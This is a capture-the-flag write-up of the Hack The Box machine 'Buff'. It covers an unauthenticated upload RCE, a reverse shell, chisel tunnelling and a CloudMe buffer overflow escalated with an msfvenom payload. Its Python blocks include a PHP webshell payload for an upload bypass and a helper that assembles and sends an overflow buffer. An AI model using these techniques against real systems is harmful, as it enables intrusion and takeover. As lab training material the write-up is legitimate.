🕵 HTB-Writeup : BUFF

Recon
rustscan
Rustscan is a useful port scanner written in Rust. It is not a replacement for nmap but a real improvement to the workflow: Rustscan scans all 65,535 ports very quickly and then hands the open ports to nmap.
This speeds up the discovery of open ports and lets us run the slower nmap scan (with scripts) only against the ports that are actually open.
dirbuster
Running dirbuster against the web server, we found a lot of files and directories.

Searching vulnerabilities
Trying SQLi
I first tried SQL injection on the main page, against the login form parameters (email= and password=).
It failed: neither parameter appears to be vulnerable.
Then I tried the feedback.php page.
Again, the feed parameter does not seem to be vulnerable.
I tried several other pages but could not find any SQLi. I don't think this is the entry point.
Gym Management Software
On the contact.php page, we find that the website was built with Gym Management Software v1.0.

Searching for this software with searchsploit, we found 4 entries.
I first tried the Unauthenticated Remote Code Execution exploit.
It relies on the fact that the upload.php page of the gym management system does not check whether the user is authenticated, so anyone can upload files. By uploading a PHP file with a double extension and image magic bytes at the beginning, we bypass both the extension whitelist and the file type check.
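To make the bypass concrete, here is an added, constructed model of the two weaknesses described above (a missing session check, and an extension whitelist plus magic-byte check that a double extension slips past), next to a hardened handler. This is my own illustration, not the Gym Management Software code: the helper names, the `upload` directory and the exact way the weak handler derives the stored filename are assumptions chosen to reproduce the behaviour the writeup describes.

```python
"""Constructed model of the upload.php weakness: not the real Gym Management code."""

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
MAGIC_BY_EXT = {"png": PNG_MAGIC, "gif": b"GIF8", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
IMAGE_WHITELIST = set(MAGIC_BY_EXT)
UPLOAD_DIR = "upload"  # assumed web-accessible upload directory


def craft_upload(name="shell", php=b'<?php echo shell_exec($_GET["cmd"]); ?>'):
    """Filename with a double extension and PNG magic bytes in front of the PHP."""
    return f"{name}.php.png", PNG_MAGIC + b"\n" + php


def vulnerable_upload(filename, content, authenticated=False):
    """Hypothetical weak handler: ignores the session, whitelists on the LAST
    extension, sniffs the magic bytes, but builds the stored name from the FIRST
    two dot-separated parts, so 'shell.php.png' lands on disk as 'shell.php'."""
    parts = filename.split(".")
    ext = parts[-1].lower()
    if ext not in IMAGE_WHITELIST:          # whitelist check (last extension only)
        return None
    if not content.startswith(MAGIC_BY_EXT[ext]):  # "file type" check (magic bytes only)
        return None
    stored = ".".join(parts[:2])
    return f"{UPLOAD_DIR}/{stored}"


def hardened_upload(filename, content, authenticated=False):
    """Require a session, take the extension exactly once, refuse any dot in the
    base name, keep the magic check, refuse PHP open tags (a heuristic; the real
    fix is to re-encode the image and store it where PHP is never executed), and
    choose the stored name server-side."""
    if not authenticated:
        return None
    base, dot, ext = filename.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in IMAGE_WHITELIST or "." in base:
        return None
    if not content.startswith(MAGIC_BY_EXT[ext]) or b"<?" in content:
        return None
    safe = "".join(c for c in base.lower() if c.isalnum()) or "file"
    return f"{UPLOAD_DIR}/{safe}.{ext}"


if __name__ == "__main__":
    fname, body = craft_upload()
    print("weak handler stored:", vulnerable_upload(fname, body))      # upload/shell.php
    print("hardened handler stored:", hardened_upload(fname, body, True))  # None
```

The weak handler passes both checks because each one looks at a different part of the name and content; the hardened one derives the extension once and ties every decision to that single value.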
It works! We can get the user flag!
Get clean shell
But the shell given by this exploit is not very comfortable: we cannot change directory and we do not see error output. I managed to get a clean, persistent and interactive shell instead.
To do so, I hosted netcat on an SMB share from my machine, copied it to the target, and used it to pop a PowerShell reverse shell.
We now have a clean shell.
Path to the privesc
Local recon
I first looked for any exploitable privileges enabled on our user. It has no interesting privileges.
Then I listed the network connections with the netstat command, filtering on TCP first.
I found two services listening on the localhost address only. One is a MySQL server, probably belonging to the XAMPP install.
The other is CloudMe.exe, a file storage service.
Search for any vulnerabilities
Using searchsploit, we find several vulnerabilities for the CloudMe service.
Among them is a Python exploit for a buffer overflow, but sadly the target has no Python installed. The script also has to be run from the same host, because CloudMe only listens on localhost, so for the moment I have no solution.
Tunneling
From now on, the term victim refers to the box and attacker to my computer.
After some research, I found that a tunnel solves this. A tunnel forwards traffic between a host and a target, which lets us run the exploit locally (on my machine) while its traffic is forwarded to the box.
To do so, I used Chisel, "A fast TCP/UDP tunnel, transported over HTTP, secured via SSH".
First, we start a chisel server on the attacker, listening on port 8000.
On the victim, we upload the chisel binary and run it in client mode. The remote argument follows the pattern <local-host>:<local-port>:<remote-host>:<remote-port>.
Explaining the arguments:
- 10.10.16.6:8000 : attacker IP and chisel server port
- R:8888:localhost:8888 :
  - R : reverse mode, the listener is opened on the remote side (the attacker)
  - 8888 : open a listener on port 8888 of the attacker
  - localhost : all traffic is forwarded to localhost... (the victim)
  - 8888 : ... on port 8888 of the victim
This command creates the tunnel: all traffic sent to port 8888 of the attacker (my computer) is forwarded to port 8888 of the victim.

On the attacker, the chisel server log confirms that the tunnel is established. It can also be verified with netstat on the attacker.
The tunnel is up: we are now listening on port 8888 and all traffic to that port will be forwarded to the victim.
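Reading a chisel remote spec by hand is error-prone, so here is an added parser for the <local-host>:<local-port>:<remote-host>:<remote-port> pattern, with the defaults chisel's README documents (local-host 0.0.0.0, local-port equal to remote-port, remote-host 0.0.0.0, protocol tcp). It is my own illustration, not chisel's code; socks remotes and IPv6 brackets are out of scope, and the attacker/victim labels are just the names used in this writeup.

```python
"""Added illustration: parse chisel remote specs and say which side listens where."""
from dataclasses import dataclass


@dataclass
class Remote:
    reverse: bool
    local_host: str
    local_port: int
    remote_host: str
    remote_port: int
    proto: str = "tcp"


def parse_remote(spec: str) -> Remote:
    """Accepts 'port', 'lport:rhost:rport' and 'lhost:lport:rhost:rport',
    optionally prefixed with 'R:' and suffixed with '/tcp' or '/udp'."""
    reverse = spec.startswith("R:")
    if reverse:
        spec = spec[2:]
    proto = "tcp"
    if "/" in spec:
        spec, proto = spec.rsplit("/", 1)
        if proto not in ("tcp", "udp"):
            raise ValueError(f"unknown protocol {proto!r}")
    parts = spec.split(":")
    if len(parts) == 1:                      # '3000': both ports equal, both hosts default
        lhost, lport, rhost, rport = "0.0.0.0", parts[0], "0.0.0.0", parts[0]
    elif len(parts) == 3:                    # '3000:example.com:80'
        lhost, (lport, rhost, rport) = "0.0.0.0", parts
    elif len(parts) == 4:                    # '127.0.0.1:3000:example.com:80'
        lhost, lport, rhost, rport = parts
    else:
        raise ValueError(f"unsupported remote {spec!r}")
    return Remote(reverse, lhost, int(lport), rhost, int(rport), proto)


def listener_side(r: Remote) -> str:
    """Which chisel process opens the local listener: the server for R: remotes."""
    return "server" if r.reverse else "client"


def binds_all_interfaces(r: Remote) -> bool:
    """True when the listener is reachable from any host that can reach the machine."""
    return r.local_host in ("0.0.0.0", "")


def describe(r: Remote, server: str = "attacker", client: str = "victim") -> str:
    who = server if r.reverse else client
    other = client if r.reverse else server
    return (f"chisel {listener_side(r)} ({who}) listens on {r.local_host}:{r.local_port}/{r.proto} "
            f"and forwards through the {other} to {r.remote_host}:{r.remote_port}")


if __name__ == "__main__":
    for spec in ("R:8888:localhost:8888", "R:127.0.0.1:8888:localhost:8888"):
        r = parse_remote(spec)
        print(spec, "->", describe(r), "| exposed to the network:", binds_all_interfaces(r))
```

Two practical points follow from the parse: the server must be started with `--reverse` for it to accept `R:` remotes at all, and because local-host defaults to 0.0.0.0, `R:8888:localhost:8888` exposes the victim's CloudMe port to anyone who can reach the attacker machine; `R:127.0.0.1:8888:localhost:8888` keeps the listener on the loopback interface.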
Creating the exploit
Now that the tunnel is in place, we can run the Python exploit locally while its traffic is redirected to the box.
We take the Python exploit found on exploitdb.
The exploit uses a simple buffer overflow in the CloudMe service. Since the service runs with administrator privileges, so does anything we execute through it. By default, the script's payload only launches calc.exe.
We generate our own payload with msfvenom, in the same format as the exploit's, but using a reverse shell payload.
The -v payload switch names the output variable payload, so the generated Python can be pasted straight into the script in place of the old one.
We start a netcat listener on the port configured in the payload and run the exploit.
We get an administrator shell! We can now retrieve the root flag :)
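As an added example of the steps above (not code from this writeup or from the exploit-db script), here is a small Python helper that reassembles the bytes from `msfvenom -f python -v payload` output, checks them against the bad characters, and lays out the overflow buffer in the usual padding + return address + NOP sled + shellcode shape, then sends it to 127.0.0.1:8888 so it goes through the chisel tunnel. OFFSET, RET_ADDR, NOP_SLED and TOTAL_LEN are placeholders, not the real values: take those from the exploit script. The msfvenom output sample is constructed and is not real shellcode.

```python
"""Added illustration: build and sanity-check a CloudMe-style overflow buffer."""
import ast
import re
import socket
import struct

# Placeholders: the real offset, gadget address and request size come from the exploit script.
OFFSET = 1000          # bytes of padding before the saved return address (placeholder)
RET_ADDR = 0x41414141  # address of the jmp/push esp gadget (placeholder)
NOP_SLED = 16          # NOPs between the return address and the shellcode (placeholder)
TOTAL_LEN = 1500       # total size of the request the PoC sends (placeholder)
BADCHARS = b"\x00"     # bytes the payload must avoid; assumed msfvenom was run with -b '\x00'

# Matches the lines msfvenom emits with -f python -v payload: payload =  b"" / payload += b"..."
_LINE = re.compile(r'^\s*(\w+)\s*\+?=\s*(b"(?:[^"\\]|\\.)*")\s*$')


def parse_msfvenom_python(text: str, var: str = "payload") -> bytes:
    """Reassemble the shellcode bytes from msfvenom's python-format output."""
    out = b""
    for line in text.splitlines():
        m = _LINE.match(line)
        if m and m.group(1) == var:
            out += ast.literal_eval(m.group(2))
    return out


def check_badchars(shellcode: bytes, badchars: bytes = BADCHARS) -> set:
    """Return the set of forbidden byte values present in the shellcode."""
    return {b for b in badchars if b in shellcode}


def build_buffer(shellcode: bytes, offset=OFFSET, ret=RET_ADDR, nops=NOP_SLED,
                 total=TOTAL_LEN, badchars=BADCHARS) -> bytes:
    """padding | ret (little-endian) | NOP sled | shellcode | filler up to total bytes."""
    bad = check_badchars(shellcode, badchars)
    if bad:
        raise ValueError(f"shellcode contains bad chars: {sorted(bad)}")
    room = total - offset - 4 - nops
    if len(shellcode) > room:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, only {room} available")
    buf = b"\x90" * offset + struct.pack("<I", ret) + b"\x90" * nops + shellcode
    return buf + b"C" * (total - len(buf))


def rejects(shellcode: bytes) -> bool:
    """True when build_buffer refuses the shellcode (bad chars or too large)."""
    try:
        build_buffer(shellcode)
        return False
    except ValueError:
        return True


def send_exploit(buf: bytes, host: str = "127.0.0.1", port: int = 8888) -> None:
    """With the chisel tunnel up, 127.0.0.1:8888 on the attacker reaches CloudMe on the victim."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(buf)


# Constructed sample in msfvenom's output shape; these bytes are NOT real shellcode.
SAMPLE_MSFVENOM = r'''payload =  b""
payload += b"\x90\x90\xcc\xcc"
payload += b"\xeb\xfe"
'''

if __name__ == "__main__":
    sc = parse_msfvenom_python(SAMPLE_MSFVENOM)
    buf = build_buffer(sc)
    print(f"{len(sc)} shellcode bytes, {len(buf)} byte request, bad chars: {check_badchars(sc)}")
    # send_exploit(buf)   # only once the tunnel and the netcat listener are up
```

The bad-character and size checks are what catch the usual mistakes when swapping payloads: a reverse shell is larger than the calc.exe payload, and a payload generated without `-b '\x00'` will be truncated by the service before the return address is ever reached.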
Tags
Easy, External, Apache, Python, Penetration Tester Level 2, Buffer Overflow, A04:2021-Insecure Design, Reversing, PHP, Remote Code Execution, A06:2021-Vulnerable And Outdated Components